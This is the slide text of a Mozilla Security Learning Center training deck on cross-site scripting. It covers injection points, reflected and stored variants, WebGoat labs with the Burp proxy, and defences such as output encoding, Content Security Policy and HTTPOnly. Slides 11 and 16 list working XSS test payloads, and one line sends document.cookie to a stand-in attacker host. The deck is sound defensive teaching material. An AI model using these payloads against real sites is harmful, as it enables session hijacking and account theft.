Introduction to cross site scripting

1. Mozilla
Security
Learning Center
Cross Site Scripting

2. Agenda
• Business risk of XSS
• Understanding the vulnerability
• Attack scenarios
• Mitigation techniques
• Security enhancements

3. Setup
• http://people.mozilla.org/~mcoates/
WebSecurityLab.html#installation
• http://bit.ly/MozLab
• Download Virtual Box, OWASP Broken Web App VM

4. Agenda
• Business risk of XSS
• Understanding the vulnerability
• Attack scenarios
• Mitigation techniques
• Security enhancements

5. Risks of XSS
• Top Web Security Issue on OWASP Top 10 (2011, 2007, 2004)
• Impact: Vulnerability allows attacker to change any aspect of a
vulnerable web page
• Business Impact:
• Compromise of user accounts
• False data displayed on website
• Remote monitoring of user actions with website
• Full attacker control of content displayed and served from
website

6. XSS in the News

7. Agenda
• Business risk of XSS
• Understanding the vulnerability
• Attack scenarios
• Mitigation techniques
• Security enhancements

8. Fundamental Problem
• Confusion between data for display and data to execute
• Example: Forum message discussing JavaScript
What does
<script>alert(‘hi’)</script>
do?

9. XSS Example - Intended Use
(1) User submits their name
Bob
Name:_____
submit
(2) Page displays name
Hello: Bob
submit

10. XSS Example - Attack
(1) Attacker submits malicious code
javascript
Name:_____
submit
(3) Malicious site steals
passwords & installs malware
(2) Code is now part of webpage
<div class=”featured”> Login: ___
Pass: ____
<form action=”/en-US/firefox/
users/login” method=”post”
id=”login” class=”featured-inner
object-lead”>
submit to evil site
javascript
<install malware>
<div>
<input type=”hidden”
name=”data[Login][referer]”

11. XSS Points of Attack
• HTML Element Content
<b>Hello <script>alert(1)</script></b>
• HTML Attributes
<input type="text" value=" "><script>alert(1)</script> " >
<input type="text" value=" "onmouseover= " alert(1) " >
• JavaScript
<script>x='a'</script><script>alert(1);x= 'a'</script>
• CSS
#Xsstc { background-image: url('about:blank#Hello%20World'); }
• HTML URL Parameters
<a href="http://www.site.com?test= "><script>alert(1)</script><hr >

12. Variations
• Reflected
• Attack code not stored in vulnerable site
• Exploit delivered via malicious link
• Stored
• Attack code stored in vulnerable site
• User exploited by visiting vulnerable page
• Dom
• Client side only, no server record

13. Agenda
• Business risk of XSS
• Understanding the vulnerability
• Attack scenarios
• Mitigation techniques
• Security enhancements

14. WebGoat
• Click First Link - OWASP WebGoat version 5.3.x
• Username / Password is guest / guest

15. Setup
• http://people.mozilla.org/~mcoates/
WebSecurityLab.html#installation
• http://bit.ly/MozLab
• Download Virtual Box, OWASP Broken Web App VM

16. Cross Site Scripting (XSS)
• Problem: User controlled data returned in HTTP response
contains HTML/JavaScript code
• Impact: Session Hijacking, Full Control of Page, Malicious
Redirects
• Basic XSS Test:
“ ><script>alert(document.cookie)</script>
• Cookie Theft Example:
“><script>document.location='http://attackersite/
'+document.cookie</script>

17. Lab! - Reflected XSS

18. Reflected XSS Lab
• Lesson: Cross-Site Scripting->Reflected XSS Attacks
• Proxy Not Needed

19. Using A Proxy
• Burp - Configure to listen on 8080
• Ensure “loopback only” is checked (will be by default)

20. Set Firefox Proxy
• Set Firefox proxy to 8080
• Preferences
-> Advanced
-> Network
-> Settings
• Set HTTP Proxy
• Important - clear
“No Proxy for” line

21. Confirm Setup Works
• Refresh Web Browser - it should hang
• Go to Burp -> Proxy -> Intercept (they are highlighted)
• Click “Forward” for all messages
• Should now see page in browser

22. Confirm Setup Works
• Intercept is on
• Each request will be caught by proxy
• Requires you to hit forward each time
• Intercept is off
• Requests sent through proxy automatically
• Logged in tab “proxy”->”history”

23. “Hello World” of Proxies
• Lesson: General->Http Basic
• Objective:
• Enter your name into text box
• Intercept with proxy & change entered name to different
value
• Receive response & observe modified value is reversed
Joe Sue
Attacker’s euS euS
Web Proxy Web Server
Browser

24. Lab! - Stored XSS

25. Stored XSS Lab
• Lesson: Cross-Site Scripting->Stored XSS Attacks
• Proxy Not Needed

26. Agenda
• Business risk of XSS
• Understanding the vulnerability
• Attack scenarios
• Mitigation techniques
• Security enhancements

27. XSS Prevention
• Solution
1. Output Encoding - converts command characters to
benign characters
2. Input Validation - secondary, best practice
View Source: View Source:
<td>test message - <td>test message -
“><script>alert(docu &quot;&gt;&lt;script&gt;ale
ment.cookie)</ rt(document.cookie)&lt;/
script> script&gt;
</td></tr> </td></tr>

28. Agenda
• Business risk of XSS
• Understanding the vulnerability
• Attack scenarios
• Mitigation techniques
• Security enhancements

29. Content Security Policy (CSP)
• CSP - New defensive control to
eliminate XSS
Name:_____
• Allows web site to specify
where JavaScript can be loaded submit
from
• Injected JavaScript via XSS is CSP Policy
rendered inert X-Content-
• Violations & potential XSS Security-Policy:
allow 'self'; img-src
attacks are reported to web site
for investigation 'self' data:

30. XSS Example with CSP
(1) Attacker submits malicious code
javascript
Name:_____
submit
(2) CSP prevents script execution (3) Site safe to use
<div class=”featured”>
<form action=”/en-US/firefox/
users/login” method=”post”
id=”login” class=”featured-inner
object-lead”> Name:_____
javascript
<div>
<input type=”hidden”
submit
name=”data[Login][referer]”
value=”/en-US/developers/addons”
id=”LoginReferer” /><input
Violation report sent to
site.com/CSPalert

31. Implementing CSP
• Some code changes needed to externalize JavaScript
• Run CSP in report only mode to test
• Enable CSP and protect users with browsers supporting CSP
• Receive alerts on potential vulnerabilities in app and quickly
address to protect remaining users

32. CSP Violation Reporting
• Violations of CSP policy
reported to specified URL
X-Content-Security-Policy:
• Acts as XSS intrusion allow self; report-uri http://
reportcollector.example.com/
detection system collector.cgi
• CSP supported in portion of
site users, XSS IDS benefits
all
• Reported data is from client,
trust accordingly

33. CSP Violation Reporting
CSP Violation
javascript
• Report Includes:
• HTTP Request Violation report sent to
site.com/CSPalert
• request-headers
• blocked-uri
• violation-directive
• original-policy

34. CSP Violation Report

35. Other CSP Benefits
• Prevent ClickJacking via frame-ancestors
• Control embedded frames via frame-src
• Control domains for images via img-src
• Control target domains via xhr-src
• Enforce specific protocols (https://*.foo.com)
• Future enhancement to control actions & malicious forms

36. Protecting Outdated Users
• HTTPOnly mitigates one of XSS impacts - session hijacking
• Supported in all recent browsers
• Easy, opt-in security control to protect users
Attacker’s Site
javascript
Cookie: SessionID

37. Summary
• XSS
• Untrusted user data not properly handled in response
• Exists with user data in HTML, JavaScript, CSS, etc
• Defensive Design
• Encode for context - HTML Entity encoding, JavaScript encoding,
etc
• Content Security Policy - Strong layer of defense
• HTTPOnly flag - Easy add for some benefits
• More Info - OWASP XSS Prevention Cheat Sheet

38. Next Sessions
• Upcoming
• August 16, 2011 - Hands-On Hacking Brownbag - SQL
Injection
• August 25, 2011 - OWASP Bay Area Chapter Meeting
• https://wiki.mozilla.org/WebAppSec#Schedule
• https://blog.mozilla.com/webappsec/